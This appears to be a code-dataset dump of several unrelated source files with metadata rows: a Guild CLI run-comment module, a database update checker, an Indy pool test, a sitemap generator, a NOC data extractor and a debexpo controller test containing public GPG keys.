        msg_template="--remote option requires one of: %s",
)
def _check_comment_args(args, ctx):
cmd_impl_support.check_incompatible_args(
[
("list", "add"),
("list", "delete"),
("list", "clear"),
("add", "delete"),
("add", "clear"),
("edit", "delete"),
("edit", "clear"),
("delete", "clear"),
],
args,
ctx,
)
def _comment(args, ctx):
if args.list:
_list_comments(args, ctx)
elif args.delete:
_delete_comment(args.delete, args, ctx)
elif args.clear:
_clear_comments(args, ctx)
else:
_add_comment(args, ctx)
def _list_comments(args, ctx):
_list_runs_comments(runs_op_selected(args, ctx, LATEST_RUN_ARG))
def _list_runs_comments(runs, comment_index_format=True):
formatted_runs = format_runs(runs)
cols = [
_col1_for_comments_header(comment_index_format),
"op_desc",
"started",
"status_with_remote",
"label",
]
cli.table(
formatted_runs,
cols,
detail=["_run"],
detail_cb=_run_comments_detail_cb(comment_index_format),
max_width_adj=STYLE_TABLE_WIDTH_ADJ,
fg=_fg_for_comments_header(comment_index_format),
)
def _col1_for_comments_header(comment_index_format):
if comment_index_format:
return "short_id"
else:
return "index"
def _fg_for_comments_header(comment_index_format):
if comment_index_format:
return "yellow"
else:
return None
def _run_comments_detail_cb(comment_index_format):
def f(formatted_run):
run = formatted_run["_run"]
comments = run.get("comments")
if comments:
index = 1
for comment in comments:
_print_comment(index, comment, comment_index_format)
index += 1
else:
_print_no_comments(comment_index_format)
return f
def _print_comment(index, comment, comment_index_format):
from guild import help
out = help.ConsoleFormatter()
out.write_text(_format_comment_header(index, comment, comment_index_format))
out.write_paragraph()
    if comment_index_format:
        out.indent()
    else:
        # No "[N]" index prefix - indent twice to line the body up under
        # the more deeply offset header.
        out.indent()
        out.indent()
out.write_text(_format_comment_body(comment))
cli.out("".join(out.buffer))
def _format_comment_header(index, comment, comment_index_format):
user = _format_comment_user(comment)
time = _format_comment_time(comment)
if comment_index_format:
return "[%i] %s %s" % (index, user, time)
else:
return " %s %s" % (user, time)
def _format_comment_user(comment):
user = comment.get("user") or ""
host = comment.get("host") or ""
if not host:
return user
return "%s@%s" % (user, host)
def _format_comment_time(comment):
time_attr = comment.get("time")
try:
return util.format_timestamp(time_attr)
except (ValueError, TypeError):
return str(time_attr)
def _format_comment_body(comment):
return comment.get("body") or ""
def _print_no_comments(comment_index_format):
if comment_index_format:
cli.out(" <no comments>")
def _delete_comment(comment_index, args, ctx):
preview = (
"You are about to delete comment %i from the following runs:" % comment_index
)
confirm = "Continue?"
no_runs = "No runs to modify."
def delete_comments(selected):
for run in selected:
new_comments = _delete_run_comment(run, comment_index)
run.write_attr("comments", new_comments)
cli.out("Deleted comment for %i run(s)" % len(selected), err=True)
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
delete_comments,
LATEST_RUN_ARG,
True,
)
def _delete_run_comment(run, comment_index):
comments = run.get("comments")
try:
del comments[comment_index - 1]
except IndexError:
pass
return comments
def _clear_comments(args, ctx):
preview = cmd_impl_support.format_warn(
"WARNING: You are about to delete ALL comments from the following runs:"
)
confirm = "Continue?"
no_runs = "No runs to modify."
def clear_comments(selected):
for run in selected:
run.del_attr("comments")
cli.out("Deleted all comments for %i run(s)" % len(selected), err=True)
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
clear_comments,
LATEST_RUN_ARG,
)
def _add_comment(args, ctx):
runs = runs_op_selected(args, ctx, LATEST_RUN_ARG)
comment, edited = _comment_for_args(args, runs)
if not comment:
cli.out("Aborting due to an empty comment.", err=True)
cli.error()
def add_comment(selected):
for run in selected:
new_comments = _add_run_comment(run, comment, args.user)
run.write_attr("comments", new_comments)
cli.out("Added comment to %i run(s)" % len(selected), err=True)
if edited:
# Skip prompt below because the editor serves as a prompt.
add_comment(runs)
return
preview = "You are about to add a comment to the following runs:"
confirm = "Continue?"
no_runs = "No runs to modify."
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
add_comment,
LATEST_RUN_ARG,
True,
lambda *_args: runs,
)
def _comment_for_args(args, runs):
comment = args.add
edited = False
if not comment or args.edit:
comment = _get_comment_with_editor(comment, runs)
edited = True
return comment.strip(), edited
def _get_comment_with_editor(initial_comment, runs):
msg_lines = [
initial_comment or "",
"# Type a comment for the runs below. Lines starting with '#' are ",
"# ignored. An empty comment aborts the command.",
"#",
"# Runs:",
]
formatted_runs = _format_runs_for_comment_msg(runs)
msg_lines.extend(["# %s" % line for line in formatted_runs.split("\n")])
return util.edit(
"\n".join(msg_lines),
extension=".GUILD_COMMENT",
strip_comment_lines=True,
)
def _format_runs_for_comment_msg(runs):
out = six.StringIO()
formatted = format_runs(runs)
cols = [
"short_index",
"op_desc",
"started",
"status_with_remote",
"label",
]
cli.table(formatted, cols, indent=2, file=out)
return out.getvalue().strip()
def _add_run_comment(run, comment, user):
from . import run_impl
comments = run.get("comments") or []
if user:
user, host = _split_comment_user(user)
if not host:
host = util.hostname()
else:
user = util.user()
host = util.hostname()
comments.append(
{
"body": comment,
"user": user,
"host": host,
"time": run_impl.comment_timestamp(),
}
)
return comments
def _split_comment_user(user):
    parts = user.split("@", 1)
    if len(parts) == 2:
        return parts[0], parts[1]
    return parts[0], None
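# Illustrative examples (not in the original source):
#   _split_comment_user("alice@host1") -> ("alice", "host1")
#   _split_comment_user("alice")       -> ("alice", None)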
| 26.400097
| 88
| 0.615258
|
4a18e97517b8146db954c806cb011e5da1eb08d9
| 2,799
|
py
|
Python
|
database/db_checker.py
|
KevynTang/vein-project
|
1a49515ac112493c1b6510d9a382c3b64629ba8e
|
[
"MIT"
] | 4
|
2021-10-01T04:54:01.000Z
|
2021-11-10T05:27:01.000Z
|
database/db_checker.py
|
KevynTang/vein-project
|
1a49515ac112493c1b6510d9a382c3b64629ba8e
|
[
"MIT"
] | null | null | null |
database/db_checker.py
|
KevynTang/vein-project
|
1a49515ac112493c1b6510d9a382c3b64629ba8e
|
[
"MIT"
] | 2
|
2021-09-27T05:31:34.000Z
|
2022-01-29T00:43:27.000Z
|
from database.db_reader import read_from_db, check_table_exist, check_table_not_empty
from database import date_getter
def get_standard_latest_trade_date(frequency='daily'):
if frequency == 'quarter':
return date_getter.get_quarter_end_date_before()
else:
return date_getter.get_trade_date_before(frequency=frequency.upper())
def get_latest_trade_date_from_table(table_name, column_name='TRADE_DATE'):
return read_from_db(
f'''SELECT {column_name} FROM {table_name} ORDER BY {column_name} DESC LIMIT 1;'''
)[column_name][0]
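# Illustrative example (not in the original source): for a hypothetical table
# INDEX_DAILY this issues
#   SELECT TRADE_DATE FROM INDEX_DAILY ORDER BY TRADE_DATE DESC LIMIT 1;
# and returns the single most recent value in the TRADE_DATE column.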
def no_checker(table_name):
    # table_name is unused; kept so every checker shares the same signature.
    return {
        'type': 'no check',
        'need_fill': True,
        'fill_controller': {}
    }
def light_checker(table_name):
    """
    The check passes as long as the table exists and
    contains more than zero records.
    :param table_name: table name
    :return: a report dict with status information
    """
    if not check_table_exist(table_name):
        return {
            'type': 'light check',
            'need_fill': False,
            'fill_controller': {}
        }
    if check_table_not_empty(table_name):
        return {
            'type': 'light check',
            'need_fill': False,
            'fill_controller': {}
        }
    else:
        return {
            'type': 'light check',
            'need_fill': True,
            'fill_controller': {}
        }
def date_checker(table_name, frequency='daily', column_name='TRADE_DATE'):
    if not check_table_not_empty(table_name):
        return {
            'type': 'date check',
            'need_fill': True,
            'fill_controller': {}
        }
    table_latest_date = get_latest_trade_date_from_table(table_name, column_name)
    standard_latest_date = get_standard_latest_trade_date(frequency)
    passed = table_latest_date == standard_latest_date
    if passed:
        return {
            'type': 'date check',
            'need_fill': False,
            'fill_controller': {
                'latest_date': table_latest_date
            }
        }
    else:
        return {
            'type': 'date check',
            'need_fill': True,
            'fill_controller': {
                'latest_date': table_latest_date
            }
        }
def manual_checker(table_name):
    while True:
        print(f'Update table {table_name}? (y/n)', end=': ')
        user_resp = input().lower()
        if user_resp == 'y':
            print('Please enter a date earlier than the last update time (yyyymmdd)', end=': ')
            latest_date = input()
            return {
                'type': 'manual check',
                'need_fill': True,
                'fill_controller': {
                    'latest_date': latest_date
                }
            }
        elif user_resp == 'n':
            return {
                'type': 'manual check',
                'need_fill': False,
                'fill_controller': {}
            }
        else:
            pass  # unrecognized input; ask again
| 27.99
| 90
| 0.544837
|
4a18e9b14c50a0addcaf57bdba73d221f5b00095
| 1,314
|
py
|
Python
|
tests/functional_tests/pool/close_pool_ledger_with_valid_data_test.py
|
wYaobiz/indy-test-suite
|
7b4a3f9bb73e5830fea17a158dc0fc96ab29ac32
|
[
"Apache-2.0"
] | 1
|
2021-07-26T14:19:07.000Z
|
2021-07-26T14:19:07.000Z
|
tests/functional_tests/pool/close_pool_ledger_with_valid_data_test.py
|
wYaobiz/indy-test-suite
|
7b4a3f9bb73e5830fea17a158dc0fc96ab29ac32
|
[
"Apache-2.0"
] | null | null | null |
tests/functional_tests/pool/close_pool_ledger_with_valid_data_test.py
|
wYaobiz/indy-test-suite
|
7b4a3f9bb73e5830fea17a158dc0fc96ab29ac32
|
[
"Apache-2.0"
] | null | null | null |
from indy import pool
from utilities import utils
from utilities import common, constant
from test_scripts.functional_tests.pool.pool_test_base import PoolTestBase
import pytest
class TestClosePoolLedgerConfig(PoolTestBase):
@pytest.mark.asyncio
async def test(self):
# 1. Create pool ledger configure.
# 2. Open pool ledger.
        self.pool_handle = await common.create_and_open_pool_ledger_for_steps(
            self.steps, self.pool_name, constant.pool_genesis_txn_file)
# 3. Close pool ledger.
self.steps.add_step("Close pool ledger")
result = await utils.perform(self.steps, pool.close_pool_ledger,
self.pool_handle, ignore_exception=True)
# 4. Verify that pool ledger is closed successfully.
self.steps.add_step("Verify that pool ledger is closed successfully")
error_message = "Cannot close opened pool ledger"
if utils.check(self.steps, error_message,
condition=lambda: result is None):
            # prevent the post-condition from closing the pool ledger again.
self.pool_handle = None
| 41.0625
| 79
| 0.592846
|
4a18e9b72f87bebf55ae46995c10589174009fca
| 736
|
py
|
Python
|
lib/generator/sitemap.py
|
vane/static-site-generator
|
14a6031dac43f04a5ede7d95dec846e619d0c8b9
|
[
"MIT"
] | null | null | null |
lib/generator/sitemap.py
|
vane/static-site-generator
|
14a6031dac43f04a5ede7d95dec846e619d0c8b9
|
[
"MIT"
] | null | null | null |
lib/generator/sitemap.py
|
vane/static-site-generator
|
14a6031dac43f04a5ede7d95dec846e619d0c8b9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import lib.helper
def generate(posts, config, output):
data = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
"""
for p in posts:
        url = config['url'] + '/' + p.url
partial = """<url>
<loc>{}</loc>
<lastmod>{}</lastmod>
</url>""".format(url, p.date.isoformat())
data += partial
data += """</urlset>"""
fpath = lib.helper.join_path(output, 'sitemap.xml')
print('generate sitemap')
lib.helper.write_file(fpath, data)
| 35.047619
| 235
| 0.63587
|
4a18ea43a2db591292baf9f946112fe8fb9ec45e
| 173
|
py
|
Python
|
tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_ConstantTrend_Seasonal_MonthOfYear_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_ConstantTrend_Seasonal_MonthOfYear_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_ConstantTrend_Seasonal_MonthOfYear_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Difference'] , ['ConstantTrend'] , ['Seasonal_MonthOfYear'] , ['MLP'] );
| 43.25
| 95
| 0.768786
|
4a18ea5c25d07904b583c5ca7f4d3aadeb6fa286
| 384
|
py
|
Python
|
catkin_ws/build/lane_filter/catkin_generated/pkg.installspace.context.pc.py
|
YDHsieh/YDHsieh
|
f26b6a97536fc32dd3641a2493add2c974d83c13
|
[
"CC-BY-2.0"
] | null | null | null |
catkin_ws/build/lane_filter/catkin_generated/pkg.installspace.context.pc.py
|
YDHsieh/YDHsieh
|
f26b6a97536fc32dd3641a2493add2c974d83c13
|
[
"CC-BY-2.0"
] | null | null | null |
catkin_ws/build/lane_filter/catkin_generated/pkg.installspace.context.pc.py
|
YDHsieh/YDHsieh
|
f26b6a97536fc32dd3641a2493add2c974d83c13
|
[
"CC-BY-2.0"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "lane_filter"
PROJECT_SPACE_DIR = "/home/yard/duckietown/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| 42.666667
| 68
| 0.710938
|
4a18eb82ac049673c155079e5dbfbb05a743a450
| 69
|
py
|
Python
|
start.py
|
igna31/Wasm
|
574e2cd78f7a87762106e90b80b1cad64039f0d1
|
[
"MIT"
] | null | null | null |
start.py
|
igna31/Wasm
|
574e2cd78f7a87762106e90b80b1cad64039f0d1
|
[
"MIT"
] | null | null | null |
start.py
|
igna31/Wasm
|
574e2cd78f7a87762106e90b80b1cad64039f0d1
|
[
"MIT"
] | null | null | null |
import os
os.system("wat2wasm main.wat")
os.system("node script.js")
| 17.25
| 30
| 0.73913
|
4a18ebda93d3401192ed91866e18523a2564013f
| 56
|
py
|
Python
|
02_numpy/solutions/14_solutions.py
|
HirahTang/datascience_starter_course
|
a4429db9ae1795eaf52b795d16897466d769c40c
|
[
"CC0-1.0"
] | 3
|
2020-09-06T06:01:41.000Z
|
2020-09-23T19:03:04.000Z
|
01_numpy/solutions/14_solutions.py
|
glemaitre/smob_paristech_12_2018
|
b669206f204a3e57e71efb3dd22e2ffbc4e0a309
|
[
"CC0-1.0"
] | 4
|
2019-02-22T21:37:20.000Z
|
2019-03-12T13:20:29.000Z
|
01_numpy/solutions/14_solutions.py
|
glemaitre/smob_paristech_12_2018
|
b669206f204a3e57e71efb3dd22e2ffbc4e0a309
|
[
"CC0-1.0"
] | 5
|
2020-10-26T05:03:09.000Z
|
2022-03-24T04:22:09.000Z
|
import numpy as np  # import added so the snippet runs standalone

x = np.arange(3).reshape((3, 1))
y = np.arange(3)
x + y
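# Broadcasting: shape (3, 1) + shape (3,) -> shape (3, 3), with entry
# [i, j] equal to i + j.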
| 14
| 32
| 0.553571
|
4a18ec1f09b7cf2bea7fab4b64a880f179d146a6
| 5,476
|
py
|
Python
|
core/etl/extractor/base.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | 1
|
2019-09-20T09:36:48.000Z
|
2019-09-20T09:36:48.000Z
|
core/etl/extractor/base.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
core/etl/extractor/base.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Data Extractor
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
import logging
import gzip
import os
import csv
import itertools
from collections import namedtuple
# NOC modules
from noc.core.log import PrefixLoggerAdapter
from noc.config import config
from noc.core.backport.time import perf_counter
logger = logging.getLogger(__name__)
class BaseExtractor(object):
"""
Data extractor interface. Subclasses must provide
*iter_data* method
"""
Problem = namedtuple("Problem", ["line", "is_rej", "p_class", "message", "row"])
name = None
PREFIX = config.path.etl_import
REPORT_INTERVAL = 1000
# List of rows to be used as constant data
data = []
# Suppress deduplication message
suppress_deduplication_log = False
def __init__(self, system):
self.system = system
self.config = system.config
self.logger = PrefixLoggerAdapter(logger, "%s][%s" % (system.name, self.name))
self.import_dir = os.path.join(self.PREFIX, system.name, self.name)
self.fatal_problems = []
self.quality_problems = []
def register_quality_problem(self, line, p_class, message, row):
self.quality_problems += [
self.Problem(line=line + 1, is_rej=False, p_class=p_class, message=message, row=row)
]
def register_fatal_problem(self, line, p_class, message, row):
self.fatal_problems += [
self.Problem(line=line + 1, is_rej=True, p_class=p_class, message=message, row=row)
]
def get_new_state(self):
if not os.path.isdir(self.import_dir):
self.logger.info("Creating directory %s", self.import_dir)
os.makedirs(self.import_dir)
path = os.path.join(self.import_dir, "import.csv.gz")
self.logger.info("Writing to %s", path)
return gzip.GzipFile(path, "w")
def get_problem_file(self):
if not os.path.isdir(self.import_dir):
self.logger.info("Creating directory %s", self.import_dir)
os.makedirs(self.import_dir)
path = os.path.join(self.import_dir, "import.csv.rej.gz")
self.logger.info("Writing to %s", path)
return gzip.GzipFile(path, "w")
def iter_data(self):
for row in self.data:
yield row
def filter(self, row):
return True
def clean(self, row):
return row
def extract(self):
def q(s):
if s == "" or s is None:
return ""
elif isinstance(s, unicode):
return s.encode("utf-8")
else:
return str(s)
# Fetch data
self.logger.info("Extracting %s from %s", self.name, self.system.name)
t0 = perf_counter()
data = []
n = 0
seen = set()
for row in self.iter_data():
if not self.filter(row):
continue
row = self.clean(row)
if row[0] in seen:
if not self.suppress_deduplication_log:
self.logger.error("Duplicated row truncated: %r", row)
continue
else:
seen.add(row[0])
data += [[q(x) for x in row]]
n += 1
if n % self.REPORT_INTERVAL == 0:
self.logger.info(" ... %d records", n)
dt = perf_counter() - t0
speed = n / dt
self.logger.info("%d records extracted in %.2fs (%d records/s)", n, dt, speed)
# Sort
data.sort()
# Write
f = self.get_new_state()
writer = csv.writer(f)
writer.writerows(data)
f.close()
if self.fatal_problems or self.quality_problems:
self.logger.warning(
"Detect problems on extracting, fatal: %d, quality: %d",
len(self.fatal_problems),
len(self.quality_problems),
)
self.logger.warning("Line num\tType\tProblem string")
for p in self.fatal_problems:
self.logger.warning(
"Fatal problem, line was rejected: %s\t%s\t%s" % (p.line, p.p_class, p.message)
)
for p in self.quality_problems:
self.logger.warning(
"Data quality problem in line: %s\t%s\t%s" % (p.line, p.p_class, p.message)
)
# Dump problem to file
try:
f = self.get_problem_file()
writer = csv.writer(f, delimiter=";")
for p in itertools.chain(self.quality_problems, self.fatal_problems):
writer.writerow(
[str(c).encode("utf-8") for c in p.row]
+ [
"Fatal problem, line was rejected"
if p.is_rej
else "Data quality problem"
]
+ [p.message.encode("utf-8")]
)
except IOError as e:
self.logger.error("Error when saved problems %s", e)
finally:
f.close()
else:
self.logger.info("No problems detected")
| 34.658228
| 99
| 0.524105
|
4a18ec2609f32193792343235dc303cf02506279
| 14,574
|
py
|
Python
|
debexpo/tests/functional/test_my.py
|
jadonk/debexpo
|
a022160492e40cd02bafc413a3cb009551fd6f8d
|
[
"MIT"
] | null | null | null |
debexpo/tests/functional/test_my.py
|
jadonk/debexpo
|
a022160492e40cd02bafc413a3cb009551fd6f8d
|
[
"MIT"
] | null | null | null |
debexpo/tests/functional/test_my.py
|
jadonk/debexpo
|
a022160492e40cd02bafc413a3cb009551fd6f8d
|
[
"MIT"
] | 2
|
2017-01-20T23:08:40.000Z
|
2019-08-13T20:30:00.000Z
|
from debexpo.tests import TestController, url
from debexpo.lib import constants
from debexpo.model import meta
from debexpo.model.users import User
from debexpo.model.user_countries import UserCountry
import md5
class TestMyController(TestController):
_LOW_STRENGTH_GPGKEY = """-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
mQENBEwmV4wBCADCbdBf65H0r13XfVVncCc9pW7XkDYuKD8locXY48IdKVQRKK97
lJUZv7Ys/nx1QTTux/S7ldhQS2Op4pA86uEQOnynmM2S5uePIslbkRKGnfcfUYdE
9Ij7S0+ZIafr2MUdehFLuPhCH9ddepA5rSLfgVfMAUpwyZ+/VZOCxczLntOWhTqH
xcN4aHJ7M6EXixH4uOe+hL2PeNw1LGN/ESXgEsPuJkYnKQb6XYFGFb08WyiJ7AXZ
JMuajajTw626U2rsqoi4HNHFifGm3K2+htR5V9gStdF7CxmCAgGyQ+/vhqMAv6zv
HLWWLbSIUOftAT6zHcu/DI9yWESe1WH6hayBABEBAAG0HVRlc3QgdXNlciA8ZW1h
aWxAZXhhbXBsZS5jb20+iQE4BBMBAgAiBQJMJleMAhsDBgsJCAcDAgYVCAIJCgsE
FgIDAQIeAQIXgAAKCRAKG4hEZ1gmHq1kCACOmW8SuVYSDIhAHWmlA9Ch4QIPsCMt
9FazOHN72Gr1gB8rdUJ0qGzkOiP349sjSPqVfHz9NX830ng2QvFl0hiVCdtUlERn
ijgBUGu0nPIpZH0UskWVXthndL3twmGtfIxwzsZEWeOrmRg24q4PMBqIOA1SNowk
Ck14LkmR65Ds9a/KS23Mnd5YoH+NDB5fABXU0vgdn6il9tJhYYJPSvssj0AoF620
h9VAJ+/qpCNxmIZBa6NhDcyOoFg0i5nPo4qJRx7e1KmApGjFdW9c/Rz8pBD3v5iQ
dfkC6NRhQVoWMzVPv7RiDuC0Ig7ub1QZ8waSNDW2uwLLqwM9bRNmedY2uQENBEwm
V4wBCACw8DO6P7tVTaYlhqffAPMpJE6O9yjqz+3LDJCXJhPD+js8y5P/6i8QA80K
F2jXpphp+d/iqMbIpp+p2w2OpoF6mbc/Frf3Jjx+4pL5lwWzoicdGvxdjDeXYmCc
zI9AxderVEh4sokN9B6i/1dG9EOpkkbQ+gt9xP1Wbc4oi+03TvjEA1s+nToEkSgy
dk2Xg69IgRBGyP8+x/Yzi5pWZrfGES0/Ui6+hfiJY6fYcLnW3mWFuJ9DZdx0JRmY
mKqzorfmnHqYkUcJEKBSP6NjS2A3+SfCyZYBCFkDOZFY1zp7YtDkMTV4/vvSXBdt
/oZNVztZk8C2n9TQve4My6kPoWfzABEBAAGJAR8EGAECAAkFAkwmV4wCGwwACgkQ
ChuIRGdYJh64QQf+KXt6/VqrjYymGvKtOdufepJpBIoUehztZxJ+QSe+eL4ttrme
BPtS964reKahaP8K77rowdBtEdOCXhFc5wLSHTNqsLB2lC3y3pzEotfxa2pyO7jG
2Boy8TIj5a6ixA1nwEwPgX6RkZwnGCn17wQzTV8y8OV8ei7z/so6VHkndRVOt9O+
x7HPR7QKPp2p/JtwP6xJUtZgaDKvBpK4rISqv7MiSHljIa4sq7wfdHw8zJ8ZTtYv
2USGdIn3QtoVRN+fsGzs2rRWK6Cc1AgNqhLgna+qagAq9hB3u52G9tjAlx2MD7yD
ABRL0EeYuGCJYJRQsw8e8JuRSaVGwfotqkIHtQ==
=PXiv
-----END PGP PUBLIC KEY BLOCK-----
"""
_LOW_STRENGTH_GPG_ID = '2048R/6758261E'
_HIGH_STRENGTH_GPGKEY = """-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.12 (GNU/Linux)
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
=fw7J
-----END PGP PUBLIC KEY BLOCK-----
"""
_HIGH_STRENGTH_GPG_ID = '4096R/AC4ABA99'
def setUp(self):
self._setup_models()
self._setup_example_user()
self._setup_example_countries()
def tearDown(self):
self._remove_example_user()
self._remove_example_countries()
def test_index(self):
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 302)
self.assertTrue(response.location.endswith(url('login')))
self.assertEquals(response.session['path_before_login'], url('my'))
response = self.app.post(url('login'), self._AUTHDATA)
response = self.app.get(url(controller='my', action='index'))
self.assertEquals(response.status_int, 200)
self.assertTrue('<a href="%s">' % (url('logout')) in response)
# test user with country
user = meta.session.query(User).filter(
User.email=='email@example.com').one()
user.country = meta.session.query(UserCountry).filter(
UserCountry.name=='Germany').one()
